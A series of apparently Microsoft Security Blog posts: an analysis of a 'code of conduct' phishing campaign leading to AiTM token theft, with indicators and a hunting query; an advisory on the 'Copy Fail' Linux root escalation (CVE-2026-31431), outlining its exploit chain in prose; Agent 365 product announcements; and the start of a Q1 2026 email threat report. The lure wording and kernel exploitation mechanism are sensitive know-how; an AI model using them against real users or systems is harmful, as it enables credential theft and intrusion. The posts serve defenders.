Between April 14 and 16, 2026, the Microsoft Defender Research team observed a series of sophisticated phishing campaigns targeting more than 35,000 users across over 13,000 organizations in 26 countries, with majority of targets located in the United States (92%). The campaign did not focus on a single vertical but instead impacted a broad range of industries, most notably Healthcare & life sciences (19%), Financial services (18%), Professional services (11%), and Technology & software (11%). Messages were distributed in multiple distinct waves between 06:51 UTC on April 14 and 03:54 UTC on April 16. 

Bar graph showing volume of messages sent by hour between April 14 and 16, 2026
Figure 1. Timeline of campaign messages sent by hour
Pie charts showing the breakdown of campaign recipients by country and industry.
Figure 2. Campaign recipients by country and industry

Emails in this campaign posed as internal compliance or regulatory communications, using display names such as “Internal Regulatory COC”, “Workforce Communications”, and “Team Conduct Report”. Subject lines included “Internal case log issued under conduct policy” and “Reminder: employer opened a non-compliance case log”.

Message bodies claimed that a “code of conduct review” had been initiated, referenced organization-specific names embedded within the text, and instructed recipients to “open the personalized attachment” to review case materials. At the top of each message, a notice stated that the message had been “issued through an authorized internal channel” and that links and attachments had been “reviewed and approved for secure access”, reinforcing the email’s purported legitimacy. To further support the confidentiality of the supposed review, the end of each message contained a green banner stating that the contents had been encrypted using Paubox, a legitimate service associated with HIPAA-compliant communications.

Screenshot of sample phishing email
Figure 3. Sample phishing email

Analysis of the sending infrastructure indicated that the campaign emails were sent using a legitime email delivery service, likely originating from a cloud-hosted Windows virtual machine. The messages were sent from multiple sender addresses using domains that are likely attacker-controlled.

Each campaign email included a PDF attachment with filenames such as Awareness Case Log File – Tuesday 14th, April 2026.pdf and Disciplinary Action – Employee Device Handling Case.pdf. The attachment provided additional context about the supposed conduct review, including a summary of the review process and instructions for accessing supporting documentation. Recipients were directed to click a “Review Case Materials” link within the PDF, which initiated the credential harvesting flow.

Screenshot of PDF attachment used in the campaign
Figure 4. PDF attachment

When clicked, users were initially directed to one of two attacker-controlled domains (for example, acceptable-use-policy-calendly[.]de or compliance-protectionoutlook[.]de). These landing pages displayed a Cloudflare CAPTCHA, presented as a mechanism to validate that the user was coming “from a valid session”. This CAPTCHA likely served as a gating mechanism to impede automated analysis and sandbox detonation. 

Screenshot of captcha challenge.
Figure 5. CAPTCHA challenge

After completing the CAPTCHA, users were redirected to an intermediate site designed to prepare them for the final stage of the attack. This page informed users that the requested documentation was encrypted and required account authentication. While this stage of the attack has several hallmarks of device code phishing, we were only able to confirm the AITM portion of the attack chain.

Screenshot of intermediate site asking users to click review & sign button
Figure 6. Intermediate site asking users to click “Review & Sign”

After clicking the provided “Review & Sign” button, users were presented with a sign-in prompt requesting their email address.

Screenshot of prompt directing users to enter email address
Figure 7. Prompt directing users to enter their email address

After submission, users were required to complete a second CAPTCHA involving image selection.

Screenshot of second captcha challenge
Figure 8. Second CAPTCHA challenge

Once these steps were completed, users were shown a message indicating that verification was successful and that their “case” was being prepared.

Screenshot of message telling users that verification completed successfully
Figure 9. Message telling users that “Verification completed successfully”

Following these steps, users were redirected to a third site hosting the final stage of the attack. Analysis of the underlying code indicates that the final destination varied depending on whether the user accessed the workflow from a mobile device or a desktop system.

Screenshot of code used to redirect users based on platform, whether mobile or dekstop
Figure 10. Code used to redirect users based on platform

On the final page, users were informed that all materials related to their code of conduct review had been “securely logged”, “time-stamped”, and “maintained within the organization’s centralized compliance tracking system”. They were then prompted to schedule a time to discuss the case, which required signing in to their account.

screenshot of final page instructing users to sign in
Figure 11. Final page instructed users to sign in

Selecting the “Sign in with Microsoft” option redirected users to a Microsoft authentication page, initiating an AiTM session hijacking flow designed to capture authentication tokens and compromise user accounts.

Mitigation and protection guidance

Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.

  • Review the recommended settings for Exchange Online Protection and Microsoft Defender for Office 365 to ensure your organization has established essential defenses and knows how to monitor and respond to threat activity.
  • Invest in user awareness training and phishing simulations. Attack simulation training in Microsoft Defender for Office 365, which also includes simulating phishing messages in Microsoft Teams, is one approach to running realistic attack scenarios in your organization.
  • Enable Zero-hour auto purge (ZAP) in Defender for Office 365 to quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.
  • Responders could also manually check for and purge unwanted emails containing URLs and/or Subject fields that are similar, but not identical, to those of known bad messages. Investigate malicious email that was delivered in Microsoft 365 and use Threat Explorer to find and delete phishing emails.
  • Turn on Safe Links and Safe Attachments in Microsoft Defender for Office 365.
  • Enable network protection in Microsoft Defender for Endpoint.
  • Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
  • Enable password-less authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support password-less. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for multifactor authentication (MFA). Refer to this article for the different authentication methods and features.
  • Configure automatic attack disruption in Microsoft Defender XDR. Automatic attack disruption is designed to contain attacks in progress, limit the impact on an organization’s assets, and provide more time for security teams to remediate the attack fully.

Microsoft Defender detections

Microsoft Defender customers can refer to the list of applicable detections below. Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.

Tactic Observed activity Microsoft Defender coverage 
Initial accessPhishing emailsMicrosoft Defender for Office 365
– A potentially malicious URL click was detected
– A user clicked through to a potentially malicious URL
– Suspicious email sending patterns detected
– Email messages containing malicious URL removed after delivery
– Email messages removed after delivery
– Email reported by user as malware or phish
PersistenceThreat actors sign in with stolen valid entitiesMicrosoft Entra ID Protection
– Anomalous Token
– Unfamiliar sign-in properties
– Unfamiliar sign-in properties for session cookies  

Microsoft Defender for Cloud Apps
– Impossible travel activity

Microsoft Security Copilot

Microsoft Security Copilot is embedded in Microsoft Defender and provides security teams with AI-powered capabilities to summarize incidents, analyze files and scripts, summarize identities, use guided responses, and generate device summaries, hunting queries, and incident reports.

Customers can also deploy AI agents, including the following Microsoft Security Copilot agents, to perform security tasks efficiently:

Security Copilot is also available as a standalone experience where customers can perform specific security-related tasks, such as incident investigation, user analysis, and vulnerability impact assessment. In addition, Security Copilot offers developer scenarios that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs.

Threat intelligence reports

Microsoft Defender XDR customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Hunting queries

Microsoft Defender XDR customers can run the following advanced hunting queries to find related activity in their networks:

Campaign emails by sender address

The following query identifies emails associated with this campaign using a message’s sending email address.

EmailEvents
| where SenderMailFromAddress in (" cocpostmaster@cocinternal.com "," nationaladmin@gadellinet.com ","
nationalintegrity@harteprn.com”,” m365premiumcommunications@cocinternal.com”,” documentviewer@na.businesshellosign.de”)

Indicators of compromise

IndicatorTypeDescriptionFirst seenLast seen
compliance-protectionoutlook[.]deDomainDomain hosting malicious campaign content2026-04-142026-04-16
acceptable-use-policy-calendly[.]deDomainDomain hosting malicious campaign content2026-04-142026-04-16
cocinternal[.]comDomainDomain hosting sender email address2026-04-142026-04-16
Gadellinet[.]comDomainDomain hosting sender email address2026-04-142026-04-16
Harteprn[.]comDomainDomain hosting sender email address2026-04-142026-04-16
Cocpostmaster[@]cocinternal.comEmail addressEmail address used to send campaign emails2026-04-142026-04-16
Nationaladmin[@]gadellinet.comEmail addressEmail address used to send campaign emails2026-04-142026-04-16
Nationalintegrity[@]harteprn.comEmail addressEmail address used to send campaign emails2026-04-142026-04-16
M365premiumcommunications[@]cocinternal.comEmail addressEmail address used to send campaign emails2026-04-142026-04-16
Documentviewer[@]na.businesshellosign.deEmail addressEmail address used to send campaign emails2026-04-142026-04-16
Awareness Case Log File – Monday 13th, April 2026.pdfFilenameName of PDF attachment containing phishing link2026-04-142026-04-14
Awareness Case Log File – Tuesday 14th, April 2026.pdfFilenameName of PDF attachment containing phishing link2026-04-152026-04-15
Awareness Case Log File – Wednesday 15th, April 2026.pdfFilenameName of PDF attachment containing phishing link2026-04-162026-04-16
5DB1ECBBB2C90C51D81BDA138D4300B90EA5EB2885CCE1BD921D692214AECBC6SHA-256File hash of campaign PDF attachment2026-04-14  2026-04-16  
B5A3346082AC566B4494E6175F1CD9873B64ABE6C902DB49BD4E8088876C9EADSHA-256File hash of campaign PDF attachment2026-04-142026-04-16
11420D6D693BF8B19195E6B98FEDD03B9BCBC770B6988BC64CB788BFABE1A49DSHA-256File hash of campaign PDF attachment2026-04-142026-04-16

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

The post Breaking the code: Multi-stage ‘code of conduct’ phishing campaign leads to AiTM token compromise appeared first on Microsoft Security Blog.

CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environments

Microsoft Defender is investigating a high-severity local privilege escalation vulnerability (CVE-2026-31431) affecting multiple major Linux distributions including Red Hat, SUSE, Ubuntu, and AWS Linux. This vulnerability allows unauthorized escalation of privileges to root, impacting a significant portion of cloud Linux workloads and millions of Kubernetes clusters. Although active exploitation has been limited and primarily observed in proof-of-concept testing, the vulnerability’s broad applicability has caused widespread concern.

Given the availability of a fully working exploit proof-of-concept (PoC) and the race to patch systems, Microsoft Defender is seeing preliminary testing activity that might result most likely in increased threat actor exploitation over the next few days, as also confirmed by the recent addition of this vulnerability to the Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerability (KEV) catalog.

In this report, Microsoft Defender shares detailed analyses and detection insights for this vulnerability, as well as mitigation recommendations and hunting guidance for customers to act on. Further investigation towards providing stronger protection measures is in progress, and this report will be updated when more information becomes available.

Vulnerability details

Technical elementDetails
Vulnerability typeLocal privilege escalation
Attack vectorCode execution from unprivileged user
Prerequisites for exploitationLocal access to the machine as non-privileged user
Brief technical explanation A bug in the Linux kernel’s crypto-subsystem can be abused by an attacker to corrupt the cache of any readable file, including setuid binaries. This corruption could be carried out by unprivileged users and could result in code execution with root privilege, effectively escalating the unprivileged user to root in an unauthorized way.

The vulnerability affects virtually all Linux distributions running kernels released from 2017 until patched versions are applied, including but not limited to Ubuntu (for example, 24.04 LTS), Amazon Linux 2023, Red Hat Enterprise Linux (RHEL 10.1), and SUSE 16, as well as other distributions like Debian, Fedora, and Arch Linux. The CVSS score is 7.8 (High), reflecting its significant impact.

From an impact assessment standpoint, successful exploitation leads to full root privilege escalation (high impact to confidentiality, integrity, and availability) and could facilitate container breakout, multi-tenant compromise, and lateral movement within shared environments. Its reliability, stealth (in-memory-only modification), and cross-platform applicability make it particularly dangerous in cloud, CI/CD, and Kubernetes environments where untrusted code execution is common.

CVE-2026-31431 (also known as “Copy Fail”) is a high‑severity local privilege escalation (LPE) vulnerability affecting the Linux kernel’s cryptographic subsystem. The vulnerability type is a logic flaw within the algif_aead module of the AF_ALG (userspace crypto API), which results in improper handling of memory during in-place operations.

The attack vector is local (AV:L) and requires low privileges with no user interaction, meaning any unprivileged user on a vulnerable system can attempt exploitation. Critically, this vulnerability is not remotely exploitable in isolation, but becomes highly impactful when chained with an initial access vector such as Secure Shell (SSH) access, malicious CI job execution, or container footholds. The primary prerequisite for exploitation is the ability to execute code as a local non-privileged user on a system running a vulnerable Linux kernel with the affected crypto module enabled.

From a technical perspective, the flaw originates from an in-place optimization introduced in 2017, where the kernel reuses source memory as the destination during cryptographic operations. By abusing the interaction between the AF_ALG socket interface and the splice() system call, an attacker can perform a controlled 4-byte write into the kernel’s page cache of any readable file. This enables corruption of in-memory representations of privileged binaries (for example, /usr/bin/su) without modifying the on-disk file.

When executed, the modified binary yields root privileges, effectively breaking the system’s privilege boundary. Notably, the exploit is deterministic, does not rely on race conditions, and could be implemented in a very small (~732‑byte) script that works across distributions. Because the page cache is shared across containers and the host , the vulnerability also enables cross-container impacts and container escape scenarios.

The following is one possible exploitation attack chain.

Phase 1: The attacker begins with reconnaissance. This may occur after gaining limited visibility into an environment (for example, a compromised CI runner, web container, or multi‑tenant host). Kernel version information is easily obtainable from within containers and user namespaces and does not require elevated privileges.

Because containers share the host kernel, a single vulnerable kernel version immediately expands the impact radius from one container to the entire node.

Phase 2: The attacker leverages a compact Python script that interacts only with standard kernel interfaces exposed to unprivileged users. The script does not rely on networking, compilation, or third‑party libraries, making it ideal for execution in restricted containers and hardened environments.

Phase 3: The attacker runs the script as either a regular Linux user on a host, or a compromised container process with no special capabilities. Crucially, the vulnerability does not require root inside the container, Kernel modules, or network access.  This makes it ideal for post‑exploitation scenarios where the attacker already has any foothold at all.

Phase 4: The exploit abuses an interaction between the AF_ALG (asynchronous crypto) socket interface, the splice() system call and improper error handling during a failed copy operation. This results in a controlled 4‑byte overwrite in the kernel page cache, allowing the attacker to corrupt sensitive kernel‑managed data even though they are unprivileged. This corruption occurs entirely within the kernel, bypassing traditional user‑space protections.

Phase 5: By corrupting kernel structures associated with credentials or execution context, the attacker escalates their process to UID 0. This completes the transition from unprivileged user to full root without touching the network. At this point, kernel trust boundaries are broken, SELinux/AppArmor protections are effectively neutralized, and local security controls are bypassed.

Mitigation and protection guidance

Immediate actions (0-24 hours):

  • Identify all instances of affected products/versions in your environment.
  • Apply mitigation based on patch availability:
    • If patches exist, apply immediately. Links to security bulletins and vendor patches are available at NVD – CVE-2026-31431.
    • If no patches exist, choose one of these interim mitigations:

○ Disable affected feature

○ Implement network isolation

○ Apply access controls

  • Review logs for signs of exploitation.

Because this vulnerability impacts a large swath of Linux devices, it is strongly recommended to do the following:

  • Patch or update your distribution’s kernel packages or to block AF_ALG socket creation.
  • Treat any container RCE as potential host compromise and enforce rapid node recycling after compromise indicators.

Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the following list of applicable detections. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

TacticObserved activityMicrosoft Defender coverage
ExecutionExploitation of CVE-2026-31431Microsoft Defender Antivirus
– Exploit:Linux/CopyFailExpDl.A
– Exploit:Python/CopyFail.A
– Exploit:Linux/CVE-2026-31431.A
– Behavior:Linux/CVE-2026-31431

Microsoft Defender for Endpoint
Possible CVE-2026-31431 (“Copy Fail”) vulnerability exploitation

Microsoft Defender for Cloud
Potential exploitation of copy-fail vulnerability detected 

Microsoft Defender Vulnerability Management (MDVM) also surfaces devices in customer environments that might be vulnerable to CVE-2026-31431.

References

This research is provided by Microsoft Defender Security Research with contributions from Andrea Lelli, Dietrich Nembhard, Nir Avnery, Ori Glassman, and  members of Microsoft Threat Intelligence.

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedInX (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.   

The post CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environments appeared first on Microsoft Security Blog.

Microsoft Agent 365, now generally available, expands capabilities and integrations

Microsoft Agent 365

Now generally available for commercial customers.

Choose an ecosystem partner for agent security and governance

AI agents aren’t coming—they’re already in your environment. They show up in places you expect (like Microsoft CopilotMicrosoft Teams, and Microsoft 365) and even more places as technology evolves (a local autonomous personal AI assistant or a new software as a service (SaaS) agent connected to your sensitive data.)

The problem isn’t that agents exist. It’s that they proliferate fast, span apps, endpoints and cloud, and often operate outside the visibility and control of the teams accountable for risk. When an agent can invoke tools, access data, and interact with other agents, any “helpful” workflow can turn into data oversharing, tool misuse, or over-privileged actions in seconds. And as agents become even easier to create and deploy, your attack surface grows with them. 

That’s why end-to-end observability matters: you can’t govern what you can’t see, and you can’t secure what you don’t understand—especially when the number of agents is a moving target. 

Microsoft Agent 365 helps you take control of agent sprawl as your control plane to observe, govern, and secure agents and their interactions—including agents built with Microsoft AI and agents from our ecosystem partners—using the admin and security workflows your teams already run. 

General availability starts today for Agent 365.

Additionally, we’re announcing the previews of new Agent 365 capabilities and integrations to help you scale agent adoption with the right controls in place. 

  • Observability, governance, and security for agents operating independently—Agent 365 is expanding to cover agents that operate with their own credentials and permissions.
  • Discovery of agents and shadow AI, using capabilities of Microsoft Defender and Microsoft Intune for both local and cloud agents.
  • A secured, managed environment for agents to work in Windows 365 for Agents.
  • Coverage for a wide ecosystem of SaaS agents, including agents innovated by software development companies (SDCs).
  • Support for evaluation, adoption, and usage from Microsoft and ecosystem partners worldwide.

Manage agents with a single control plane, regardless of how or where they work

As organizations move from pilot to adoption, AI agents are being deployed across increasingly diverse use cases. Some act with delegated access, working on behalf of users; others operate with their own credentials and permissions, participating in team workflows or operating behind the scenes. 

With Agent 365, you can observe, govern, and secure AI agents whether they act on behalf of users with delegated access—for example, an agent that helps employees organize their inbox—or agents that operate with their own access and scope of work—such as an agent autonomously triaging support tickets. 

Supported by Agent 365
Agents working on behalf of
users (delegated access) 
Generally available 
Agents operating behind
the scenes (own access) 
Generally available 
Agents participating in team
workflows (own access) 
Public Preview   

Discover and manage local and cloud-hosted agents 

Users are installing agents like OpenClaw and Claude Code on their devices and adopting SaaS agents built by developers on new and emerging platforms. Many of these local and cloud-hosted agents run unmanaged and outside of traditional governance, as they autonomously execute tasks, modify code, or access confidential information, creating a new wave of shadow AI.  

To help organizations address accelerating agent sprawl and the rise of unmanaged agents, we’re introducing new capabilities as part of Agent 365, Microsoft Defender, and Intune so you can discover shadow agents, and apply appropriate controls, such as blocking unmanaged agents. 

Discover and manage local agents

With Microsoft Defender and Intune, organizations will be able to discover and manage local AI agents running on Windows devices, starting with OpenClaw agents and expanding soon to other widely used agents like GitHub Copilot CLI and Claude Code. Customers enrolled in the Frontier program can see if OpenClaw agents are being used in the organization, which devices they are running on, and use Intune policies to block common ways that OpenClaw runs on the new Shadow AI page in Agent 365 in the Microsoft 365 admin center and in the Intune admin center. Through Agent 365 registry, the inventory of local agents will be available in Defender and Intune so IT, endpoint management, and security teams can get a consistent view of discovered local agents in their environment and take appropriate action.

Microsoft 365 admin center showing Shadow AI OpenClaw agent with Intune security policies enabled to detect and block unmanaged AI agents.
In the Microsoft 365 admin center, an IT professional can apply Intune policies to continuously detect managed devices and block the common methods of running OpenClaw on them. 

Starting in June 2026, Microsoft Defender will also provide asset context mapping for each agent including the devices they run on, MCP servers configured for those agents, the identities associated with them, and the cloud resources those identities can reach. This will give security teams the context needed to assess exposure and potential blast radius. They can then investigate agent activity, such as file access and network behavior, using familiar endpoint data, and use those insights to identify misconfigurations and even define custom detections.

Microsoft Defender interface displaying a security graph map of connected AI agents and AWS resources with ChatGPT Desktop node highlighted.
Security teams can investigate local AI agent exposure in Microsoft Defender through a relationship map that shows where an agent runs, which MCP servers are configured for use, which identities are associated with it, and which cloud resources those identities can reach. Defender context such as resource criticality and sensitive-data exposure helps teams prioritize the agents and paths that matter most. 

Beyond monitoring, organizations will be able to apply policy-based controls to set guardrails for what agents are allowed to do—helping protect both agents and organizations from compromise and misuse—with initial support delivered for OpenClaw through Intune. If a managed agent exhibits malicious behavior patterns, such as attempting to access or exfiltrate sensitive data, Defender will be able to block coding agents in runtime and generate alerts with rich incident context to support investigation and response.  

Context mapping capabilities, policy-based controls, plus runtime blocking and alerts will be available in Agent 365 through Intune and Defender public preview in June 2026. 

Visibility across clouds and AI-builder platforms

As developers are rapidly building agents with Microsoft Foundry, AWS Bedrock, and Google Gemini Enterprise Agent Platform (formerly Google Vertex AI) and deploying cloud agents across multicloud and multi-platform environments, the agent sprawl challenge intensifies. To manage potential security risks or vulnerabilities before they become breaches, security and IT teams need visibility to which cloud agents are running, what models these agents are built on, and what resources they’re accessing.

Today, we are excited to announce the public preview of Agent 365 registry sync with AWS Bedrock and Google Cloud connections, enabling IT teams to automatically discover, inventory, and, soon, perform basic lifecycle governance—for example, start, stop, delete agents—across these platforms.

Microsoft 365 admin center Registry sync page showing successful Amazon Bedrock connection with four synced AI agents listed.
Now in public preview, Microsoft 365 admins can connect and sync the Agent 365 registry with Amazon Bedrock and Google Cloud for cross-platform observability and governance. 

Manage a wide ecosystem of SaaS agents 

Agent 365 works with prebuilt agents in Microsoft 365 Copilot and Teams, agents built with Microsoft Copilot Studio or Microsoft Foundry for your organization, and agents built by software development companies partnered with Microsoft.

Delivering on our promise of control plane for the broad agent ecosystem, we’re excited to announce ecosystem partner agents fully configured to be managed by Agent 365, including Genspark, Zensai, Egnyte, and Zendesk, and agents built on agent factories, including Kasisto, Kore, and n8n. Organizations can observe, govern, and secure these agents in the Agent 365 control plane, with no integration work by IT or security teams.  

Agent 365 software development company launch partners

Collection of AI and software vendor logos including Adobe, NVIDIA, Zendesk, n8n, Kore.ai, and Celonis.
Agent 365 Software Development Company Launch Partners have built agents fully enabled to be managed by Agent 365. 

Enterprises can easily build AI agents today, but scaling them with trust and governance is where most initiatives stall. With Kore.ai deeply integrated into Microsoft Agent 365, identity, security, and governance are built in from the start—empowering enterprises to move from pilots to AI at scale with confidence.

—– Raj Koneru, Chief Executive Officer of Kore.ai

The Agent 365 developer and ecosystem partners play a critical role in extending agents into line-of-business systems, building vertical and scenario-specific integrations, modernizing legacy automation into agent workflows, extending Copilot experiences with custom agents, and helping customers operationalize agent ecosystems at scale. These Agent 365 enabled agents are then observable, governable, and securable in the Agent 365 control plane, accelerating adoption for your organization.

Secure agents as they work in Windows 365 

While Agent 365 provides the control plane to observe, govern, and secure agent activity across the enterprise, Windows 365 for Agents—now available in public preview (in the United States only)—provides a secured, managed environment where agents can carry out that work. It introduces a new class of Cloud PCs purpose-built for agentic workloads and managed in Intune, allowing agents to run in policy-controlled environments, interact with applications, and operate with the same identity, security, and management controls already used for employees.

Now, with Agent 365, you can also observe and secure agents running on Windows 365 for Agents in Microsoft 365 admin center, understanding which agents are connected to the cloud-powered compute. Together, they enable organizations to move from visibility and governance of agents to confidently running them in production environments. 

Secure agents against internet threats with network controls  

AI agents can operate much faster than human users. Without proper guardrails, they can connect to risky web destinations, interact with unsanctioned AI services, handle sensitive files unsafely, or be manipulated through malicious prompt-based attacks. These risks are harder to manage when security teams lack consistent visibility and controls for agent traffic to internet, SaaS, and AI services. 

To give security teams a consistent way to inspect agent traffic at the network layer, in general availability today, Agent 365 extends Microsoft Entra network controls to Microsoft Copilot Studio agents and agents running on user endpoint devices, including local agents such as OpenClaw. These controls can help identify unsanctioned AI usage, restrict connections to only approved web destinations, filter risky file movement, and help block malicious prompt-based attacks before they lead to harmful actions. 

Confidently scale and govern AI agents while maintaining security and control 

Agent 365 extends even further beyond Microsoft platforms to discover, observe, govern, and secure local, SaaS, and cloud agents across your agentic AI ecosystem. Each of today’s announcements build upon Agent 365 capabilities we shared in March 2026 as well as detailed feedback of customers using the Frontier program, developers integrating with the platform, and partners testing Agent 365 capabilities. 

With Agent 365, we can scale and govern AI agents with confidence, while maintaining enterprise grade security and control. Agent 365 enables organizations to move beyond experimentation, driving tangible business value and innovation through trusted AI adoption. By providing a robust and integrated platform, Agent 365 empowers teams to confidently embrace AI and accelerate transformation across the enterprise.

—Yuji Shono, Head of the Global AI Office, NTT DATA Group Corporation, a global infrastructure, networking, and IT services provider.

As organizations begin to adopt Agent 365 at scale, we’ve collaborated with strategic partners to create targeted services to help customers onboard, tackle governance challenges and realize the platform’s full value.

Grid of enterprise services partner logos including Accenture, KPMG, Cognizant, Capgemini, Avanade, Deloitte, EY, PwC, and TCS.
Featured Agent 365 launch partners, including Accenture, Bechtle, Capgemini, Insight, KPMG, Protiviti and Slalom, collaborated with Microsoft engineering teams to develop services for planning, adopting, and managing your agent control plane implementation.

Partner services offered today include expertise and guidance for: 

  • Inventory and ownership: What agents exist, who owns them, and where they run.
  • Least privilege: Right-sizing permissions and enforcing access guardrails without slowing delivery.
  • Compliance and data protection: Preventing oversharing and producing audit-ready evidence.
  • Threats and multi-platform estates: Understanding attack paths and governing across vendors and clouds.
  • Ongoing operations: Lifecycle management, monitoring, and continuous governance hygiene. 

These valuable services are typically scoped as workshops and assessments (diagnose and roadmap), governance and enablement (stand up the control plane and guardrails), managed services (run and improve continuously), advisory and readiness (operating model and adoption readiness), and security and integration (harden posture and integrate third-party agents.)

How to get started with Agent 365  

Agent 365 is now available in Microsoft 365 E7 or standalone at USD15 per user per month. Each Agent 365 license covers an individual who manages or sponsors agents, or uses agents to do work on their behalf, ensuring all agent activity is consistently governed across the organization in a way that’s predictable for scaled growth.  

In addition to the expertise of your Microsoft 365 team and partners, Agent 365 resources to support your experience include:

Plus, on Tuesday, May 12, 2026, a team of Agent 365 experts are hosting a live “Ask Microsoft Anything” to answer your questions about Agent 365—we hope you’ll join for the discussion.

Microsoft Agent 365

Now generally available for commercial customers.

Choose an ecosystem partner for agent security and governance

The post Microsoft Agent 365, now generally available, expands capabilities and integrations appeared first on Microsoft Security Blog.

What’s new, updated, or recently released in Microsoft Security

New capabilities in Microsoft Agent 365; new Microsoft Defender and GitHub integration

At Microsoft, security innovations are purpose-built to help every organization protect end-to-end with the speed and scale of AI. Our vision is simple: security should be ambient and autonomous, just like the AI it protects.

In a world where AI agents can act autonomously to take action, access data, and interact across systems, every organization should have the confidence that their security posture can scale and keep pace with their AI investments. Microsoft is focused on helping organizations gain visibility into what their agents are doing, governance over what they’re allowed to do, and protection against emerging threats. With an AI-first, end-to-end security platform grounded in Zero Trust for AI, fueled by more than 100 trillion daily threat signals1, and shaped by the Secure Future Initiative, security and IT teams can harden their security posture with protection that is continuous, intelligent, and built for the agentic era.

In the Loop is a new series from Microsoft Security that delivers timely news and updates to the global security community. Today’s edition spotlights the latest capabilities designed to help security and IT teams secure their AI agents, secure their foundations, and defend against threats in real time with the powerful combination of agents and experts.

New Microsoft Defender capabilities in Agent 365 tooling gateway

Detect, block, and investigate threats to AI agents

Get started ↗

The Agent 365 tooling gateway gives security teams the visibility and control they need to detect and respond to threats that target agentic workflows. New Microsoft Defender capabilities, now available in preview, enable security teams to detect, block and investigate anomalous behavior of their agents. Near real-time protection leverages webhooks to evaluate the actions an AI agent attempts to detect and block malicious or risky activities before they’re executed. Read more and get started.

AI-powered Defender and GitHub solution helps protect from code to runtime

GitHub Advanced Security integration

Learn more ↗

Microsoft Defender for Cloud integration with GitHub Advanced Security, now generally available, provides unified security visibility across the development lifecycle. This integration automatically maps code changes to production environments, prioritizes security alerts based on real runtime context, and enables coordinated remediation workflows between development and security teams. Teams can track vulnerabilities from source code to deployed applications, focus on the security issues that affect production workloads, and take advantage of AI-powered remediation tools to speed resolution.2 Get started today and watch the video.

New demo: Run a data security investigation in Microsoft Purview

Data Security Investigations

Get started ↗

Step into the role of a data security analyst and see how Microsoft Purview Data Security Investigations helps you identify investigation‑relevant data, analyze it using AI‑powered deep content analysis, and mitigate sensitive data risks—all within a single, integrated solution. Follow the end‑to‑end investigation journey in this hands‑on demo.

In the demo, you’ll learn how to:

  • Proactively assess data security risk across your data estate.
  • Reactively investigate data involved in security incidents, such as breaches, leaks, fraud, or bribery.
  • Visualize risk using the data risk graph, which shows correlations between sensitive content, users, and activities.

Stay In the Loop

Microsoft Security continually ships meaningful innovations across our portfolio and research-driven insights and reports for the security community. In the Loop posts are your reliable source of what’s new across Microsoft Security and what it means for your security strategy. Check back for the next drop and connect with us at Microsoft Build, June 2-3, 2026 in San Francisco, to hear directly from Microsoft Security experts, learn more about today’s releases, and more.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.


1Microsoft Digital Defense Report 2025, Safeguarding Trust in the AI Era

2GitHub Advanced Security Integration with Microsoft Defender for Cloud, Microsoft Defender for Cloud | Microsoft Learn

The post What’s new, updated, or recently released in Microsoft Security appeared first on Microsoft Security Blog.

Email threat landscape: Q1 2026 trends and insights

During the first quarter of 2026 (January-March), Microsoft Threat Intelligence detected approximately 8.3 billion email-based phishing threats, with monthly volumes declining slightly from 2.9 billion in January to 2.6 billion in March. By the end of the quarter, QR code phishing emerged as the fastest-growing attack vector, more than doubling over the period, while CAPTCHA-gated phishing evolved rapidly across payload types. Overall, 78% of email threats were link-based, while malicious payloads accounted for 19% of attacks in January—boosted by large HTML and ZIP campaigns—before settling at 13% in both February and March. Credential phishing remained the dominant objective behind malicious payloads throughout the quarter. This shift toward link-based delivery, combined with the payload trends, suggests that threat actors increasingly preferred hosted credential phishing infrastructure over locally-rendered payloads as the quarter progressed.

